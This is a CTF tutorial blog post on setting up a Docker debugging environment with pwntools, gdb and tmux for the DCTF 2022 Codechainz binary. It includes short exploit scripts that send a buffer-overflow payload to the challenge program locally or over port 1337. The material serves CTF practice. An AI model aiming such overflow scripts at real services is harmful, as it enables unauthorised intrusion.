Hi everyone! This article is about setting up a Dockerfile for debugging with pwntools, which may be useful to you during CTF challenges. The example below uses the Codechainz challenge from DCTF 2022. The “app” binary I am using can be downloaded from here. Let’s get started!
Set up the image from the Dockerfile
Firstly, we will need to modify our Dockerfile to install the other tools required for debugging the program. I also modified the location of the flag.txt and app files. Remember to create a fake flag.txt first with any value you want. I modified the Dockerfile (the lines highlighted in cyan) so that the required tools are installed while the image is built. Otherwise, if we only install them inside a running container, the installed tools are lost once we exit the container process, and reinstalling them every time is time-consuming.
FROM ubuntu:20.04
EXPOSE 1337
RUN export DEBIAN_FRONTEND=noninteractive && \
    apt-get -y update && \
    apt-get -y install socat coreutils && \
    apt-get -y install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential && \
    python3 -m pip install --upgrade pwntools && \
    apt-get -y install gdb && \
    apt-get -y install gdbserver && \
    apt-get -y install tmux
COPY chall/flag.txt /
COPY chall/app /
RUN chmod 555 /app && \
    chmod 444 /flag.txt
CMD socat -T 30 \
    TCP-LISTEN:1337,nodelay,reuseaddr,fork \
    EXEC:"stdbuf -i0 -o0 -e0 /app"
Next, let’s build the image from the Dockerfile and run a container from it. The --cap-add=SYS_PTRACE and --security-opt seccomp=unconfined options in the run command are what allow gdb to ptrace processes inside the container. Copy and paste the following into your terminal and press ENTER.
sudo docker build -f Dockerfile -t ctfchall .
sudo docker run -it --rm --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -v $(pwd):/mnt ctfchall:latest
In another terminal, list the running containers and attach to ours with tmux. We have to use tmux because pwntools’ gdb.attach spawns a new terminal window, and tmux is the only way we can get multiple windows inside a Docker container.
kali@kali~$ sudo docker ps
[sudo] password for kali:
CONTAINER ID   IMAGE             COMMAND                  CREATED         STATUS         PORTS      NAMES
1a6b1e6f4c9d   ctfchall:latest   "/bin/sh -c 'socat -…"   2 minutes ago   Up 2 minutes   1337/tcp   agitated_greider
kali@kali~$ sudo docker exec -i -t 1a6b1e6f4c9d /bin/tmux
root@1a6b1e6f4c9d:/#
Transfer the file and start debugging
Now that we have a shell inside the container, we can open another terminal and transfer our exploit file into the container.
poc.py:
from pwn import *
context.terminal = ['tmux','splitw','-h']
context.arch = "amd64"
# for local debugging
r = process("./app")
gdb.attach(r)
# choose option 1 to go to BoF vulnerable page
r.sendlineafter(b'> ', b'1')
################## Craft payload ##################
s_offset_to_ret = 0x38
payload = s_offset_to_ret * b'A' + b'U'
log.info("Payload sent: " + str(payload))
# exploit the buffer overflow vulnerability
r.sendlineafter(b'> ', payload)
r.interactive()
Alternative poc.py:
from pwn import *
context.terminal = ['tmux','splitw','-h']
context.arch = "amd64"
r = gdb.debug("./app", "c")
# choose option 1 to go to BoF vulnerable page
r.sendlineafter(b'> ', b'1')
################## Craft payload ##################
s_offset_to_ret = 0x38
payload = s_offset_to_ret * b'A' + b'U'
log.info("Payload sent: " + str(payload))
# exploit the buffer overflow vulnerability
r.sendlineafter(b'> ', payload)
r.interactive()
Note that for the alternative poc.py, we need the final r.interactive() so that gdb won’t close immediately if the program crashes. gdb.debug also needs gdbserver (“sudo apt-get install gdbserver”), which is why the Dockerfile above installs it.
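The two poc.py variants above differ only in how the target is started. As an added example (not the post’s own code), here is one script that combines them and adds a remote mode against the socat listener on port 1337; it keeps the post’s offset and payload and assumes the container’s port 1337 is published to 127.0.0.1.

```python
#!/usr/bin/env python3
# Added example (not from the original post): one pwntools script that
# drives the same "app" binary three ways, chosen on the command line:
#   python3 poc.py          -> plain local process (run inside the container)
#   python3 poc.py gdb      -> gdb.debug() in a tmux split, like the alternative poc.py
#   python3 poc.py remote   -> the socat listener on port 1337 from the Dockerfile's CMD
# pwntools is imported lazily so the pure helpers work without it installed.
import sys

BINARY = "./app"            # same path as in the post
OFFSET_TO_RET = 0x38        # s_offset_to_ret from the post's poc.py
REMOTE_HOST = "127.0.0.1"   # assumption: the container's port 1337 is reachable locally
REMOTE_PORT = 1337          # EXPOSE 1337 / TCP-LISTEN:1337 in the Dockerfile

def build_payload(offset=OFFSET_TO_RET, tail=b"U"):
    """The post's payload: `offset` filler bytes followed by the trailing byte."""
    return b"A" * offset + tail

def parse_mode(argv):
    """Map the command line to 'local', 'gdb' or 'remote' (default: local)."""
    mode = argv[1].lower() if len(argv) > 1 else "local"
    if mode not in ("local", "gdb", "remote"):
        raise ValueError(f"unknown mode {mode!r}, expected local|gdb|remote")
    return mode

def start(mode):
    """Launch the target as `mode` asks and return the pwntools tube."""
    from pwn import context, gdb, process, remote   # lazy: needs pwntools
    context.arch = "amd64"
    context.terminal = ["tmux", "splitw", "-h"]     # gdb opens in a tmux pane
    if mode == "gdb":
        # "c" continues right away; a crash then stays visible in the gdb pane
        return gdb.debug(BINARY, gdbscript="c")
    if mode == "remote":
        return remote(REMOTE_HOST, REMOTE_PORT)
    return process(BINARY)

def main():
    from pwn import log
    r = start(parse_mode(sys.argv))
    r.sendlineafter(b"> ", b"1")        # option 1: the BoF page, as in the post
    payload = build_payload()
    log.info(f"Payload sent: {payload!r}")
    r.sendlineafter(b"> ", payload)
    r.interactive()                     # keeps the tube (and gdb) open after the send

if __name__ == "__main__":
    main()
```

Run it inside the container for the local and gdb modes, and from the host for the remote mode.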
Finally, we can copy the exploit file to the Docker container.
kali@kali~$ sudo docker cp poc.py 1a6b1e6f4c9d:/poc.py
Cleanup
Once we have finished the challenge, we will want to delete the Docker image to free up some space on our Linux system. First, list the available images to find the ID of the right image before deleting it.
kali@kali~$ sudo docker images
REPOSITORY   TAG       IMAGE ID       CREATED        SIZE
ctfchall     latest    1a6b1e6f4c9d   1 minute ago   764MB
ubuntu       20.04     825d55fb6340   13 days ago    72.8MB
kali@kali~$ sudo docker image rm -f 1a6b1e6f4c9d
Untagged: ctfchall:latest
Deleted: sha256:962a1c8a1d7120adfef8b5dc1553f69846240bd72ba15b75f5e9e3bafd2b4396
Deleted: sha256:57052094e5b4fb5963c598571d3778c294633a06aac20780f4e32f64553781cd
Deleted: sha256:150683fe9cd843a0d2dca11afd7e9a3b593a2273d549c48328e44c05cf116731
Deleted: sha256:8dbdf9bd09bc16e6d86cbd81ff2b52e49c3382276595f75d9f15cd2d009d47e0
Deleted: sha256:fb25349a2946c78ed71a4c10d2da7b21c1effcfe55a77455f00f4a0611aa53bc
Deleted: sha256:d2f99a1bb8796dea5e55bdaddf7bd777bca3b943ac21a691192f83d4c5c612bb
Deleted: sha256:4cee141d38c8e1e5213c3167c62653a35637512dac9eebee311c45ae992e1efc
Deleted: sha256:f6e6981597b649b19027df43d70a7e878f629fb1f3c290b887878f4c043c0fc3
Deleted: sha256:3c6b30f9f97bd4d71cc7a6a56930cddcc0d437b74636c9ec6c33e7ee04c4c866
Deleted: sha256:099df7eea36245945d98275d99bda9b1d0494d291aadbca58002bb63b1844b22
I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂